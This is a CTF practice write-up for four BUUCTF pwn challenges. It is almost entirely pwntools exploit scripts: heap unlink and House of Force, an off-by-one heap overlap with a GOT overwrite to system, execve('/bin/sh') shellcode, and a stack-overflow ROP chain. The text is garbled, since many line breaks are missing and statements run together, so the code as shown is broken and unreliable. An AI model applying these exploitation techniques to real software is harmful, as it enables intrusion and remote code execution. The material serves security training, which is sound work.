PWN-PRACTICE-BUUCTF-19

- hitcontraining_bamboobox
- picoctf_2018_shellcode
- npuctf_2020_easyheap
- cmcc_pwnme2

hitcontraining_bamboobox

unlink，参考：hitcontraining_bamboobox 堆技巧 unlink

# -*- coding:utf-8 -*-
from pwn import *
#io=process("./bamboobox")
io=remote("node4.buuoj.cn",29339)
elf=ELF("./bamboobox")
libc=ELF("./libc-2.23-16-x64.so")def show():io.sendlineafter("Your choice:","1")	
def add(name_len,name):io.sendlineafter("Your choice:","2")io.sendlineafter("the length of item name:",str(name_len))io.sendlineafter("the name of item:",name)
def edit(index,name_len,name):io.sendlineafter("Your choice:","3")io.sendlineafter("the index of item:",str(index))io.sendlineafter("the length of item name:",str(name_len))io.sendlineafter("the new name of the item:",name)
def free(index):io.sendlineafter("Your choice:","4")io.sendlineafter("the index of item:",str(index))
def exit():io.sendlineafter("Your choice:","5")#gdb.attach(io)
#pause()add(0x40,"aaaa")
add(0x80,"bbbb")
add(0x80,"cccc")#pause()ptr=0x00000000006020C8
fd=ptr-0x18
bk=ptr-0x10
payload=p64(0)+p64(0x40)+p64(fd)+p64(bk)
payload=payload.ljust(0x40,"A")
payload+=p64(0x40)+p64(0x90)
edit(0,len(payload),payload)#pause()free(1)#pause()atoi_got=elf.got["atoi"]
payload=p64(0)*2+p64(0x40)+p64(atoi_got)
edit(0,len(payload),payload)#pause()show()
io.recvuntil("0 : ")
atoi_addr=u64(io.recv(6).ljust(8,"\x00"))
print("atoi_addr=="+hex(atoi_addr))
libc_base=atoi_addr-libc.sym["atoi"]
system=libc_base+libc.sym["system"]#pause()edit(0,0x08,p64(system))#pause()io.sendlineafter("Your choice:","/bin/sh\x00")io.interactive()

House of Force，参考：hitcontraining_bamboobox 堆技巧 House of Force

# -*- coding:utf-8 -*-
from pwn import *
context.log_level="debug"
io=process("./bamboobox")
#io=remote("node4.buuoj.cn",26168)
elf=ELF("./bamboobox")
libc=ELF("./libc-2.23-16-x64.so")def show():io.sendlineafter("Your choice:","1")	
def add(name_len,name):io.sendlineafter("Your choice:","2")io.sendlineafter("the length of item name:",str(name_len))io.sendlineafter("the name of item:",name)
def edit(index,name_len,name):io.sendlineafter("Your choice:","3")io.sendlineafter("the index of item:",str(index))io.sendlineafter("the length of item name:",str(name_len))io.sendlineafter("the new name of the item:",name)
def free(index):io.sendlineafter("Your choice:","4")io.sendlineafter("the index of item:",str(index))
def exit():io.sendlineafter("Your choice:","5")#gdb.attach(io)
#pause()add(0x30,"aaaa")
payload="a"*0x30+p64(0)+p64(0xffffffffffffffff)
edit(0,len(payload),payload)#pause()offset=0x000-0x060-0x10
add(offset,"bbbb")#移动top chunk#pause()magic=0x0000000000400D49
add(0x10,p64(magic)*2)#pause()exit()#pause()io.interactive()

picoctf_2018_shellcode

32位elf，静态编译，保护几乎全都没开
main函数中有条call eax的gadget，eax保存的是输入的起始地址，于是输入shellcode即可执行

from pwn import *
#io=process('./PicoCTF_2018_shellcode')
io=remote('node4.buuoj.cn',27908)
elf=ELF('PicoCTF_2018_shellcode')
io.recvuntil('Enter a string!\n')
shellcode=asm('xor ecx,ecx;xor edx,edx;push edx;push 0x68732f6e;push 0x69622f2f ;mov ebx,esp;mov eax,0xb;int 0x80')
io.sendline(shellcode)
io.interactive()

npuctf_2020_easyheap

obo，参考：npuctf_2020_easyheap

# -*- coding:utf-8 -*-
from pwn import *
#io=process("./npuctf_2020_easyheap")
io=remote("node4.buuoj.cn",25100)
elf=ELF("./npuctf_2020_easyheap")
libc=ELF("./libc-2.27-18-x64.so")def add(size,content):io.sendlineafter("Your choice :","1")io.sendlineafter("Size of Heap(0x10 or 0x20 only) : ",str(size))io.sendlineafter("Content:",content)
def edit(index,content):io.sendlineafter("Your choice :","2")io.sendlineafter("Index :",str(index))io.sendlineafter("Content: ",content)
def show(index):io.sendlineafter("Your choice :","3")io.sendlineafter("Index :",str(index))
def free(index):io.sendlineafter("Your choice :","4")io.sendlineafter("Index :",str(index))
def exit():io.sendlineafter("Your choice :","5")#gdb.attach(io)
#pause()add(0x18,"aaaa")#0
add(0x18,"bbbb")#1
add(0x18,"/bin/sh\x00")#2#pause()payload="a"*0x18+p64(0x41)
edit(0,payload)#pause()free(1)#pause()payload="a"*0x10+p64(0)+p64(0x21)+p64(8)+p64(elf.got["free"])
add(0x38,payload)#pause()show(1)
io.recvuntil("Content : ")
free_addr=u64(io.recvuntil("\n")[:-1].ljust(8,"\x00"))
print("free_addr=="+hex(free_addr))
libc_base=free_addr-libc.sym["free"]
system=libc_base+libc.sym["system"]
print("system=="+hex(system))#pause()edit(1,p64(system))
free(2)#pause()io.interactive()

cmcc_pwnme2

栈溢出

from pwn import *
#io=process('./cmcc_pwnme2')
io=remote('node4.buuoj.cn',29405)
elf=ELF('./cmcc_pwnme2')
gets_plt=elf.plt['gets']
string_addr=0x0804A060
exec_str=0x080485CB
io.recvuntil('Please input:\n')
payload='a'*(0x6c+4)+p32(gets_plt)+p32(exec_str)+p32(string_addr)
io.sendline(payload)
io.sendline('./flag')
io.interactive()